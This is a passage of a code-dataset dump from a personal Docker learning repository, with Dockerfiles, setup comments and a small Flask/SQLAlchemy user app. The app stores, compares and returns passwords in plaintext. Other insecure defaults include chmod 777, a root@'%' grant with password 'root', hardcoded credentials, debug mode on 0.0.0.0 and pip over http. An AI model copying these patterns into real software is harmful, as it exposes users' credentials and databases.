ping\n# SELECT index\n# flushdb命令清除数据,\n\n# sudo docker network ls\n# 创建自定义网络类型,并且指定网段\n# sudo docker network create --subnet=192.168.0.0/16 staticnet\n\n# docker inspect redis 查看IP\n\n\n# docker build -t redis:ztc .\n# docker run -p 6379:6379 --name redis -d redis:ztc\n# docker exec -it redis bash\n\n\n# sudo docker ps -a\n# docker rm 容器id\n# docker rmi 镜像id\n# sudo docker stop redis\n# sudo docker images\n# sudo docker search redis\n\n\n# 查看网络模式\n# docker network ls \n\n# 创建一个新的bridge网络\n# docker network create --driver bridge --subnet=172.18.12.0/16 --gateway=172.18.1.1 mynet\n\n# 查看网络信息\n# docker network inspect mynet\n\n# 创建容器并指定容器ip\n# docker run -e TZ=\"Asia/Shanghai\" --privileged -itd -h hadoop01.com --name hadoop01 --network=mynet --ip 172.18.12.1 centos /usr/sbin/init"
},
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.610909104347229,
"avg_line_length": 17.399999618530273,
"blob_id": "fb9c33a606d9daf62b1ab6af2d88e4b3b853c6a7",
"content_id": "0dbbbc2e70b77e2595857a682032b7850b3b35d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 275,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 15,
"path": "/python/python-web/app11111.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# coding=utf-8\nfrom flask import Flask\napp = Flask(__name__)\n\[email protected](\"/\")\ndef hello():\n return \"Hello World!1\"\n\[email protected]('/main')\ndef main():\n return \"my name is main222\"\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=5000,debug=True)"
},
{
"alpha_fraction": 0.6404682397842407,
"alphanum_fraction": 0.6772575378417969,
"avg_line_length": 27.4761905670166,
"blob_id": "6493b52f8c6bb1023ae07acffb853ae41b2cd9af",
"content_id": "d9369b56680a39cfed98b93a1b8bbd8ae67b5139",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 598,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 21,
"path": "/python/python-web/test/app.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nimport os\nfrom flask import Flask,current_app\n\napp = Flask(__name__)\n# app.config.from_object('setting.ProductionConfig')\napp.config.from_object('setting.DevelopmentConfig')\[email protected]('/')\ndef index():\n print(app.config['DB_SERVER'])\n print(app.config['DATABASE_URI'])\n print(current_app.config.get('DATABASE_URI'))\n print(os.urandom(24))\n return 'Hello, World!1a'\n\nif __name__==\"__main__\":\n # app.host='0.0.0.0'\n # app.port='89898'\n app.run(host=app.config['HOST'],port=app.config['PROT'],debug=app.config['DEBUG'])\n # app.run('0.0.0.0',8989,debug=True)\n"
},
{
"alpha_fraction": 0.6931818127632141,
"alphanum_fraction": 0.7007575631141663,
"avg_line_length": 13.722222328186035,
"blob_id": "ff6332bc6fe89aa98885eba6f700acef562b5851",
"content_id": "a68d6bb8362020b31678d268f27ef7fbb2d0a50f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 264,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 18,
"path": "/python/python-web/test/test001.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nimport os\nfrom ztc import zhang\n\nprint(os.name)\ntry:\n pass\nexcept ValueError as e:\n pass\nexcept ZeroDivisionError as e:\n pass\nexcept UnicodeError as e:\n pass\nfinally:\n pass\nif __name__ == '__main__':\n print(dir(zhang.kaishi))"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 16,
"blob_id": "029d344fddbcaa43ca7cd4ea909242ad0210766f",
"content_id": "a5485578438dc319f027e217f9a9d56946abf705",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 84,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 5,
"path": "/python/python-web/test/ztc/zhang.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n' a test module '\ndef kaishi(a,b,c):\n print(a,b,c)"
},
{
"alpha_fraction": 0.6549019813537598,
"alphanum_fraction": 0.6705882549285889,
"avg_line_length": 18.69230842590332,
"blob_id": "65f8e713fc68f190ad0f8db51989fe490c854f17",
"content_id": "dbbba6b023e877bf08aa65bce7d8e35cc4b7340c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 13,
"path": "/python/python-web/apps/database/__init__.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom .. import app\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy(app,use_native_unicode='utf8')\n# def connMysql(app):\n# global db\n# print(2)\n# db = SQLAlchemy(app)\n# print(db)\n# # print(db)\n# print(db)"
},
{
"alpha_fraction": 0.7064056992530823,
"alphanum_fraction": 0.7206405401229858,
"avg_line_length": 36.53333282470703,
"blob_id": "57d032a26a88b987b61b22dc09fc8d3c799f5802",
"content_id": "f5c4d707ca93f2407e3f7393476a4800c6ea39e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 562,
"license_type": "no_license",
"max_line_length": 344,
"num_lines": 15,
"path": "/php/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM php:fpm-alpine3.9\n\n#MAINTAINER zhangtongchuan <[email protected]>\n\n#WORKDIR /var/www/html\n\n#CMD [\"php-fpm\"]\n\n\n\n# docker build -t php:nginx .\n\n# docker run --name myphp -v /git.yonyou.com/docker/php/www:/www -d php:nginx\n\n# docker run -p 9000:80 --name nginxphp --network testnet -v /git.yonyou.com/docker/php/www:/usr/share/nginx/html -v /git.yonyou.com/docker/php/log/:/var/log/nginx/ -v /git.yonyou.com/docker/php/conf/default.conf:/etc/nginx/conf.d/default.conf -v /git.yonyou.com/docker/php/conf/nginx.conf:/etc/nginx/nginx.conf --link myphp:nginx -d nginx:html"
},
{
"alpha_fraction": 0.6770708560943604,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 28.76785659790039,
"blob_id": "dd4aa215f426509b30406b9fadd58f9e7011b4e8",
"content_id": "94f4f76aa23ced84abf600ce3f0c858e48e61880",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1666,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 56,
"path": "/python/python-web/setting.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n\nclass Config(object):\n # ENV='development' # 'production'\n DEBUG=True\n # TESTING=True\n # PROPAGATE_EXCEPTIONS=True\n # PRESERVE_CONTEXT_ON_EXCEPTION=True\n # TRAP_HTTP_EXCEPTIONS=True\n # TRAP_BAD_REQUEST_ERRORS=None\n # SECRET_KEY='abcdefghijklmnopkuxyzw'\n # SESSION_COOKIE_NAME='session'\n # SESSION_COOKIE_DOMAIN=None\n # SESSION_COOKIE_PATH='/'\n # SESSION_COOKIE_HTTPONLY=True\n # SESSION_COOKIE_SECURE=False\n # SESSION_COOKIE_SAMESITE=None\n # PERMANENT_SESSION_LIFETIME=timedelta(days=31)\n # SESSION_REFRESH_EACH_REQUEST=True\n # USE_X_SENDFILE=False\n # SERVER_NAME=None\n # APPLICATION_ROOT='/'\n # PREFERRED_URL_SCHEME='http'\n # MAX_CONTENT_LENGTH=None\n # JSON_AS_ASCII=True\n # JSON_SORT_KEYS=True\n # JSONIFY_PRETTYPRINT_REGULAR=False\n # JSONIFY_MIMETYPE='application/json'\n # TEMPLATES_AUTO_RELOAD=None\n # EXPLAIN_TEMPLATE_LOADING=False\n # MAX_COOKIE_SIZE=4093\n HOST='0.0.0.0'\n PROT='5000'\n DB_SERVER = '192.168.1.56'\n # SQLALCHEMY_DATABASE_URI='mysql+pymysql://root:[email protected]:3306/mypython?charset=utf8'\n # CREATE DATABASE mypython CHARSET=UTF8;\n SQLALCHEMY_DATABASE_URI='mysql+pymysql://root:[email protected]:3306/mypython?charset=utf8'\n \n # SQLALCHEMY_DATABASE_URI=\"mysql://root:[email protected]:3306/mydata\"\n SQLALCHEMY_COMMIT_ON_TEARDOWN=True\n SQLALCHEMY_TRACK_MODIFICATIONS=True\n # SQLALCHEMY_TRACK_MODIFICATIONS\n # @property\n # def DATABASE_URI(self): # Note: all caps\n # return 'mysql://user@{}/foo'.format(self.DB_SERVER)\n\nclass ProductionConfig(Config):\n DEBUG=False\n Zhang=\"kaishi\"\n\nclass DevelopmentConfig(Config):\n DEBUG = True\n\nclass TestingConfig(Config):\n TESTING = True"
},
{
"alpha_fraction": 0.7166666388511658,
"alphanum_fraction": 0.7277777791023254,
"avg_line_length": 19.11111068725586,
"blob_id": "2700c7ef1cfe71345af4f3b5a0caac495d9d32d6",
"content_id": "8b666e97db95a83a22efec3eea4067b8d4ecd164",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 180,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 9,
"path": "/python/python-web/apps/routers/test.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template\n\ntestIndex=Blueprint('test_index',__name__)\n\[email protected]('/test')\ndef test_index():\n return 'abc'"
},
{
"alpha_fraction": 0.6815952658653259,
"alphanum_fraction": 0.6992481350898743,
"avg_line_length": 28.413461685180664,
"blob_id": "023be47f063915c57ee6c39001a32eb345d3c73b",
"content_id": "39cf5f0233066f557d0ec5c12520b8a7a6d1dc0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 3389,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 104,
"path": "/python/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM python:3.7-alpine\n#MAINTAINET \"[email protected]\"\n# 虚拟机中的目录\nWORKDIR /app\n\n# 设置变量\nENV FLASK_APP run.py\nENV FLASK_RUN_HOST 0.0.0.0\nENV FLASK_ENV development\nENV FLASK_DEBUG TRUE\n\n# COPY ./package.json /app\nADD ./python-web/ /app\nRUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositories\nRUN apk --update --upgrade add mysql-dev\\\n build-base \n\n#RUN apk --update --upgrade add \\\n\n# # bundle 安装相关的依赖\n# git \\\n# curl \\\n# # mysql2 依赖\n# mysql-dev \\\n# # 基础设施,比如gcc相关的东西\n# build-base \\\n# # nokogiri 相关依赖\n# libxslt-dev \\\n# libxml2-dev \\\n# # 图片处理相关依赖\n# imagemagick \\\n# # tz相关,如果没有bundle的时候会报错\n# tzdata \\\n# nodejs \\\n# yarn \\\n# && rm -rf /var/cache/apk/*\n#libmysqlclient-dev\n\n#RUN pip install virtualenv\n#RUN virtualenv --no-site-packages venv\n#RUN source venv/bin/activate\nRUN pip install flask -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\n#RUN pip install flask-mysqldb -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install pymysql -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install flask-sqlalchemy -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\n# RUN pip install sqlalchemy -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install -U flask-cors -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\nRUN pip install flask-blueprint -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com\n# RUN pip freeze > requirements.txt\n# 安装\n#pip install pipreqs\n# 在当前目录生成\n#pipreqs . --encoding=utf8 --force\n\n#RUN ls\n#RUN pip list\n#RUN pip install --upgrade pip\n#RUN pip list\n#RUN mkdir /app/json\n#COPY /git.yonyou.com/FC/package.json /app/ 报错 \n# copy 是从另一个容器拷贝\n#VOLUME [\"/git.yonyou.com/docker/python/\"] 主机目录无法指定\n#RUN ls #-i http://mirrors.aliyun.com/pypi/simple\n#RUN pip install flask==1.1.1\n#RUN apt install libmysqlclient-dev\n#RUN pip install mysql==0.0.2\n#RUN pip install sqlalchemy\n#RUN pip install python-mysql\n#RUN pip install -U flask-ocrs\n#RUN pip install flask-blueprint\n\n#sudo service docker restart \n\n\n# 暴露端口\nEXPOSE 5000 \n\nCMD [\"flask\", \"run\"]\n\n\n# docker build -t python:flask .\n# 查看结果:\n# docker image ls\n# docker rmi python:flask\n# sudo docker run -p 5000:5000 --name python --network testnet -v /git.yonyou.com/docker/python/python-web:/app -d python:flask\n# docker run -p 5000:5000 --name python -v /git.yonyou.com/docker/python/python-web:/app -d python:flask --link mysql\n#sudo docker inspect mysql\n# 镜像名 pythonhello 后面,什么都不用写,因为在 Dockerfile 中已经指定了 CMD。否则,就得把进程的启动命令加在后面:\n# -p 外网:内网\n# docker run -p 80:5000 pythonhello\n# 查看容器 \n# docker ps\n# 删除容器docker rm 083084e11bc5\n# 进入容器:\n# docker exec -it pythonhello /bin/bash\n# 访问容器内应用:\n# curl http://localhost:4000\n#docker stop <容器 ID>\n#docker restart <容器 ID>\n\n# docker stop python\n# docker start python\n# docker restart python\n# docker system df\n"
},
{
"alpha_fraction": 0.6879432797431946,
"alphanum_fraction": 0.6992907524108887,
"avg_line_length": 32.619049072265625,
"blob_id": "e54c6b4901fd19fbcc377a7f9665483a48cf0592",
"content_id": "4719b006b1834f20ce9cad1e3217e555ee76415d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 705,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 21,
"path": "/python/python-web/apps/model/User.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom datetime import datetime \nfrom .Base import Base\nfrom ..database import db\n\nclass User(Base,db.Model):\n __tablename__='user'\n id=db.Column('id',db.Integer,primary_key=True,autoincrement=True)\n name=db.Column('username',db.String(50),nullable=True,unique=True)\n pwd=db.Column('password',db.String(50),nullable=True)\n email = db.Column(db.String(64), unique=True, index=True)\n sort=db.Column(db.Integer)\n addtime = db.Column('add_time',db.DateTime(),default=datetime.now)\n def __init__(self):\n pass\n def queryByNameAndPwd(self):\n print(self.name)\n return db.session.query(self).filter().all()\n def __repr__(self):\n return '<User %r>' % self.name"
},
{
"alpha_fraction": 0.6763990521430969,
"alphanum_fraction": 0.6846715211868286,
"avg_line_length": 26.399999618530273,
"blob_id": "dce10ca4cdaa873c8a65c64199c24c8c06dc9c5b",
"content_id": "94098aa54a619e820126b6c4c91bf58dbe38d207",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2127,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 75,
"path": "/python/python-web/apps/__init__.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\n# import sys\nfrom flask import Flask,make_response,request,redirect,url_for\nfrom flask_cors import *\n# from .database import db\n# from flask_sqlalchemy import SQLAlchemy\n\n# sys.path.append('.')\n\n# app = Flask(__name__,static_folder='mystatic', static_url_path='/myurl',template_folder='mytemplate')\napp = Flask(__name__,static_folder='static', static_url_path='/static',template_folder='templates')\napp.config.from_object('setting.DevelopmentConfig')\nCORS(app, supports_credentials=True)\nfrom .routers import Router\n# print('1')\n# connMysql(app)\n# db.init_app(app)\n# print(db)\n\n# print(dir(app))\n# print(connMysql)\n# db.init_app(app)\n\n# DIALECT = 'mysql'\n# DRIVER = 'pymysql'\n# USERNAME = 'root'\n# PASSWORD = '808069'\n# HOST = '127.0.0.1'\n# PORT = '3306'\n# DATABASE = 'cms'\n\n# SQLALCHEMY_DATABASE_URI = '{}+{}://{}:{}@{}:{}/{}?charset=utf8'.format(\n# DIALECT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE\n# )\n# print(SQLALCHEMY_DATABASE_URI)\n# db = SQLAlchemy(app)\n# print(db)\n\n# print(dir(db))\[email protected]_first_request\ndef before_first_request():\n print(\"before first request,第一次请求前的操作\")\[email protected]_request\ndef before_request():\n # print(request.cookies.get('username'))\n # flag = -1\n # urlList = [\n # '/user/login',\n # '/user/loginsubmit',\n # '/user/loginout'\n # ]\n # try:\n # flag = urlList.index(request.path)\n # except:\n # flag = -1\n # # print(flag)\n # if flag==-1 and request.cookies.get('username')==None:\n # return redirect(url_for('user_index.user_login'))\n print(\"before request, 每一次请求前都会执行\")\n # return 'before'\[email protected]_request\ndef after_request(response):\n response = make_response(response)\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'\n response.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n print(\"after request,加工响应对象\")\n return response\[email protected]_request\ndef teardown_request(e):\n print(\"teardown_request, 请求之后一定执行\")\n # print(e)\n\nRouter(app)\n"
},
{
"alpha_fraction": 0.6709677577018738,
"alphanum_fraction": 0.7096773982048035,
"avg_line_length": 30.0222225189209,
"blob_id": "4cb87c2deb817ea7087a1c0dcf6657d9ddab9ebb",
"content_id": "ca1e29c61c859253a9c0b669079b5dd0b7734d90",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1395,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 45,
"path": "/mysql/Dockerfile",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "FROM mysql:5.7\n\nMAINTAINER [email protected]\n\nWORKDIR /etc/mysql/\n\n\nRUN chmod -R 777 /etc/mysql/\nRUN chmod -R 777 /var/log/mysql/\nRUN chmod -R 777 /var/lib/mysql\n\n#WORKDIR /mysql_data\n#ENV MYSQL_ROOT_PASSWORD root\n#RUN echo $PWD \\\n# ls -al\n\nEXPOSE 3306\n\n# docker build -t mysql:ztc .\n# docker run -p 3306:3306 --name mysql -e MYSQL_ROOT_PASSWORD=root -v /git.yonyou.com/docker/mysql/conf/my.conf:/etc/mysql/my.conf -v /git.yonyou.com/docker/mysql/logs/:/var/log/mysql/ -v /git.yonyou.com/docker/mysql/data:/mysql_data -d mysql:ztc \n\n\n\n\n\n\n## docker stop mysql\n## docker start mysql\n# docker network create -d bridge testnet\n\n# docker build -t mysql:data .\n# docker run -p 3306:3306 --name mysql -e MYSQL_ROOT_PASSWORD=root -v /git.yonyou.com/docker/mysql/conf/:/etc/mysql/ -v /git.yonyou.com/docker/mysql/logs/:/var/log/mysql/ -v /git.yonyou.com/docker/mysql/data:/var/lib/mysql -d mysql:data\n### docker run -p 3306:3306 --name mysql --network testnet -e MYSQL_ROOT_PASSWORD=root -v /git.yonyou.com/docker/mysql/conf/:/etc/mysql/ -v /git.yonyou.com/docker/mysql/logs/:/var/log/mysql/ -v /git.yonyou.com/docker/mysql/data:/var/lib/mysql -d mysql:data\n# docker exec -it mysql bash\n# mysql -u root -p\n#GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;\n#FLUSH PRIVILEGES;\n\n# 127.0.0.1\n# root\n# root\n# mysql\n\n\n# docker network create --subnet=172.18.0.0/16 -d nat testnet"
},
{
"alpha_fraction": 0.7320442199707031,
"alphanum_fraction": 0.7430939078330994,
"avg_line_length": 26.615385055541992,
"blob_id": "739fa3d8dd786c57e50883ef5add8824e99e0124",
"content_id": "be0c18da2ef7c329d930d51a04e04abe34398472",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 362,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 13,
"path": "/nginx/html/test/js/b.js",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "\n\n// window.addEventListener('DOMContentLoaded',function(){\n// \tconsole.log('window.DOMContentLoaded')\n// })\ndocument.addEventListener('DOMContentLoaded',function(event){\n\tevent = event || window.event\n\tevent.cancelBubble=true\n\tevent.stopPropagation()\n\tevent.preventDefault()\n\ta = 4\n\tconsole.log(args)\n\tlet a = 222\n\tconsole.log('document.DOMContentLoaded')\n})\n\n"
},
{
"alpha_fraction": 0.6415332555770874,
"alphanum_fraction": 0.6518533825874329,
"avg_line_length": 29.638710021972656,
"blob_id": "2e882a996ed2835b491307c781729a64801652ad",
"content_id": "af71e5161dd45aff7e3accb29760245c28e955df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5220,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 155,
"path": "/python/python-web/apps/routers/user.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom flask import Blueprint,render_template,request,redirect,url_for,Response,make_response\nfrom datetime import datetime,timedelta\n# from datetime import \nimport json\nfrom ..model.User import User\nuserIndex=Blueprint('user_index',__name__)\n\"\"\"\n 查询所有用户数据\n User.query.all()\n\n 查询有多少个用户\n User.query.count()\n\n 查询第1个用户\n User.query.first()\n User.query.get(1) # 根据id查询\n\n 查询id为4的用户[3种方式]\n User.query.get(4)\n User.query.filter_by(id=4).all() # 简单查询 使用关键字实参的形式来设置字段名\n User.query.filter(User.id == 4).all() # 复杂查询 使用恒等式等其他形式来设置条件\n\n 查询名字结尾字符为g的所有用户[开始 / 包含]\n User.query.filter(User.name.endswith(\"g\")).all()\n User.query.filter(User.name.startswith(\"w\")).all()\n User.query.filter(User.name.contains(\"n\")).all()\n User.query.filter(User.name.like(\"%n%g\")).all() 模糊查询\n\n 查询名字和邮箱都以li开头的所有用户[2种方式]\n User.query.filter(User.name.startswith(\"li\"), User.email.startswith(\"li\")).all()\n\n from sqlalchemy import and_\n User.query.filter(and_(User.name.startswith(\"li\"), User.email.startswith(\"li\"))).all()\n\n 查询age是25 或者 `email`以`itheima.com`结尾的所有用户\n from sqlalchemy import or_\n User.query.filter(or_(User.age == 25, User.email.endswith(\"itheima.com\"))).all()\n\n 查询名字不等于wang的所有用户[2种方式]\n from sqlalchemy import not_\n User.query.filter(not_(User.name == \"wang\")).all()\n User.query.filter(User.name != \"wang\").all()\n\n 查询id为[1, 3, 5, 7, 9]的用户\n User.query.filter(User.id.in_([1, 3, 5, 7, 9])).all()\n\n 所有用户先按年龄从小到大, 再按id从大到小排序, 取前5个\n User.query.order_by(User.age, User.id.desc()).limit(5).all()\n\n 分页查询, 每页3个, 查询第2页的数据\n pn = User.query.paginate(2, 3)\n pn.items 获取该页的数据 pn.page 获取当前的页码 pn.pages 获取总页数\n\"\"\"\n\n\[email protected]('/user')\ndef user_index():\n # User.createTable()\n data = {}\n try:\n # user = User()\n # user.name = '张彤川'\n # user.pwd='123456'\n # user.email = '[email protected]'\n # flag = User.add(user)\n # if flag==False :\n # raise Exception('添加失败')\n for i in range(1):\n user = User()\n user.name = 'zhangtongchuan'\n user.pwd='123456'\n user.email = '[email protected]'\n flag = User.add(user)\n if flag==False :\n raise Exception('添加失败')\n print(i)\n break\n except BaseException:\n # finally:\n\n data['success'] = False \n data['message'] = '添加数据失败'\n # return 'abc'\n else:\n data['success'] = True \n data['message'] = '添加数据成功'\n # return 'bad'\n print(json.dumps(data))\n return json.dumps(data,skipkeys=False, ensure_ascii=False, check_circular=True, allow_nan=True, cls=None, indent=None, separators=None)\n # return 'user.index'\[email protected]('/user/querall',methods=['POST','GET'])\ndef user_all():\n # User.createTable()\n datalist = [] \n data = {}\n all_results = User.querall(User)\n for user in all_results:\n datauser={\n 'name': user.name,\n 'password': user.pwd,\n 'email': user.email\n }\n datalist.append(datauser)\n # print(user.name,user.pwd,user.email)\n # print(all_results)\n data['data'] = datalist\n data['success'] = True\n data['message'] = '查询成功'\n return json.dumps(data,ensure_ascii=False)\n return 'user.querall'\[email protected]('/user/<username>',methods=['POST','GET'])\ndef user_user(username):\n # print(request.cookies)\n return render_template('user/user.html',username=username)\n\[email protected]('/user/loginout',methods=['POST','GET'])\ndef user_loginout():\n response = make_response(redirect(url_for('user_index.user_login'))) # Response(\"设置cookie\")\n response.delete_cookie('username')\n return response\n return redirect(url_for('user_index.user_login'))\[email 
protected]('/user/loginsubmit',methods=['POST','GET'])\ndef user_loginsubmit():\n username = request.form.get('username')\n password = request.form.get('password')\n result = User.query.filter_by(name=username,pwd=password).all()\n if len(result) > 0:\n response = make_response(redirect(url_for('user_index.user_user',username=username))) # Response(\"设置cookie\")\n expires = datetime.now() + timedelta(days=30,hours=16) \n # ,expires=expires\n # print(expires)\n response.set_cookie('username',username,domain='0.0.0.0:8989')\n # print(username)\n # print(print(request.cookies.get('username')))\n return response\n # return redirect(url_for('user_index.user_user',username=username))\n else:\n return redirect(url_for('user_index.user_login'))\n\n\n # user = User()\n # user.name = username\n # user.pwd=password\n # result = user.queryByNameAndPwd()\n # print(result)\n # return 'afasdfas'\n # redirect('http://localhost:5000/hello')\[email protected]('/user/login',methods=['POST','GET'])\ndef user_login():\n # if request.method==\"POST\":\n \n # else:\n return render_template('user/login.html')"
},
{
"alpha_fraction": 0.6715542674064636,
"alphanum_fraction": 0.7184750437736511,
"avg_line_length": 27.45833396911621,
"blob_id": "ddc690f05a30c241bf33504beb790d83bea4aa90",
"content_id": "aa6330a29b627cb99a0755ea1123b5ea1143014e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 682,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 24,
"path": "/python/python-web/test/test.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n'''\nmkdir mypython\ncd mypython\nsudo apt-get install python-virtualenv\nsudo apt-get install python3-pip\nvirtualenv -p /usr/bin/python3 venv\n virtualenv --no-site-packages venv\nsource ./venv/bin/activate\n./venv/bipip3 install uwsgi\n./venv/bin/uwsgi --http :8000 --gi-file test.py \n\nsudo pip3 install Django==2.0.3\ndjango-admin startproject myweb\n\nuwsgi --http :8000 --chdir /home/setup/myweb --wsgi-file myweb/wsgi.py --master --processes 4 --threads 2 --stats 127.0.0.1:8001\n'''\nimport sys\nprint(sys.version)\n\ndef application(env, start_response):\n start_response('200 OK', [('Content-Type','text/html')])\n return [b'Hello World']"
},
{
"alpha_fraction": 0.7046728730201721,
"alphanum_fraction": 0.7046728730201721,
"avg_line_length": 28.77777862548828,
"blob_id": "b55cb6062017eb2b2fd715b946fb06c35721e91a",
"content_id": "88096d4cbc48fb2ba3f969f4a0ff0b0d2494d0e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 18,
"path": "/python/python-web/apps/utils/json.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "import json\nfrom datetime import datetime\nfrom flask import request\nclass DateEncoder(json.JSONEncoder):\n def default(self,obj):\n if isinstance(obj, datetime):\n return obj.strftime('%Y-%m-%d %H:%M:%S')\n elif isinstance(obj, date):\n return obj.strftime(\"%Y-%m-%d\")\n else:\n return json.JSONEncoder.default(self, obj)\n\ndef jsonLoads():\n # print(request.get_data(as_text=True))\n return json.loads(request.get_data(as_text=True))\n\ndef jsonDumps(data):\n return json.dumps(data,ensure_ascii=False, cls=DateEncoder)"
},
{
"alpha_fraction": 0.6263065934181213,
"alphanum_fraction": 0.6511324048042297,
"avg_line_length": 44.91999816894531,
"blob_id": "27f5fda74888262ed65912bd498a08248e1b6d7a",
"content_id": "79a45d7ed24ec3b1bccebf589b13fd3490d207b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2484,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 50,
"path": "/python/python-web/apps/model/News.py",
"repo_name": "enterpriseih/dockertest",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#coding=utf-8\nfrom datetime import datetime \nfrom ..database import db\nfrom .Base import Base\n# print ('abc',db)\n# class News(db.Model):\n# def __init__(self,title):\n# pass\n\n# def asdfasd(self):\n# pass\n# from .. import db\n# # print db\nclass News(Base,db.Model):\n __tablename__ = 'news'\n id = db.Column(db.Integer, primary_key=True,unique=True,index=True) # 'ID',\n newsclassid = db.Column(db.Integer,nullable=True) # 'newsclassid',\n title = db.Column('title',db.String(100),nullable=True) # 'title',\n keywork = db.Column(db.String(200),nullable=True) #'关键字',\n description = db.Column(db.String(500),nullable=True) #'描述',\n addtime = db.Column(db.DateTime(),default=datetime.now) #'添加时间',\n updatetime = db.Column(db.DateTime(),default=datetime.now) #'修改时间',\n deletetime = db.Column(db.DateTime(),default=datetime.now) #'删除时间',\n order = db.Column(db.Float(),default=1) #'排序',\n code = db.Column(db.String(32),unique=True,nullable=True) #'编码',\n name = db.Column(db.String(200),nullable=True) #'名称',\n pinyinname = db.Column(db.String(200),nullable=True) #'名称拼音',\n cnname = db.Column(db.String(200),nullable=True) # '中文名称预留',\n enname = db.Column(db.String(200),nullable=True) #'英文名称',\n color = db.Column(db.String(200),nullable=True) #'名称颜色',\n classname 